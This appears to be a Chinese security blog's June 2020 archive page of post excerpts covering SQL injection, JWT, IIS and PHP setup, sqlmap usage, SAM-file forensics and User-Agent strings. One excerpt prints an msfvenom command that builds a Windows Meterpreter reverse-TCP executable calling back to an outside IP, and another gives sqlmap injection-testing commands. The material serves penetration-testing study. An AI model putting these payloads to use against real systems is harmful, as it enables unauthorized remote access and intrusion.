第2章 SQL注入攻击:课时1:注入攻击原理及自己编写一个注入点
摘要:OWASP TOP10 漏洞第一就是sql注入 以及乌云网上爆出的漏洞基本5个就有1个是sql注入漏洞,所以要引起重视。 sql注入只跟数据库有关,跟平台或脚本无关(不管是php、asp、jsp还是windows、linux)
阅读全文
posted @ 2020-06-18 10:25
06 2020 档案
配置IIS10支持php语言脚本
摘要:基本可以参考下面的链接去做,只是有个地方需要注意下! <><><><>在添加模块映射时提示“FastCgiModule不是可识别的本机模块……”(参考:FastCgiModule不是可识别的本机模块 的解决办法 | 我的BLOG ) PS:就是appwiz.cpl这里需要添加这些(添加后可以刷新II
阅读全文
posted @ 2020-06-16 15:43
身边的base64解码工具
摘要:Linux base64工具(带有-d标志用于解码): $ echo eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9 | base64 -d {"typ":"JWT","alg":"HS256"} 浏览器JavaScript控制台: >> atob("eyJ0eXAiOiJ
阅读全文
posted @ 2020-06-11 18:16
什么是JWT
摘要:什么是JWT Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于JSON的开放标准((RFC 7519).该token被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,
阅读全文
posted @ 2020-06-11 11:28
msfvenom的shell在windows中的使用
摘要:msfvenom的shell在windows中的使用 msfvenom生成shell.exe msfvenom -p windows/meterpreter/reverse_tcp lhost=123.123.123.123 lport=2222 -f exe >/root/shell.exe 输入
阅读全文
posted @ 2020-06-10 12:57
sqlmap和手注
摘要:get方式的注入用 sqlmap -u url+参数 post方式通过保存请求到文件,然后用 sqlmap -r xxx.txt 如果上面无效时,可以试试添加--data="name=value"来指定传参进行测试注入。 下面的情况可以用sqlmap -u url --data="name=valu
阅读全文
posted @ 2020-06-02 23:31
Windows硬盘文件分析取证(新建的用户名)-通过SAM文件获取用户名的三种方式
摘要:*.E01文件经过百度得知是镜像压缩文件,可以用IsoBuster软件打开,也可以用AccessData FTK Imager工具打开,加载后获取到SAM文件和system文件 Kali中chntpw工具找出SAM文件的用户名 用SAMInside工具导入SAM和System找出用户名 用windo
阅读全文
posted @ 2020-06-01 13:47
User-Agent集合
摘要:小米手机: User-Agent: Mozilla/7.0 (Linux; U; Android 9.0; zh-cn; MI 11 Build/NRJJ90M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.
阅读全文
posted @ 2020-06-01 04:04
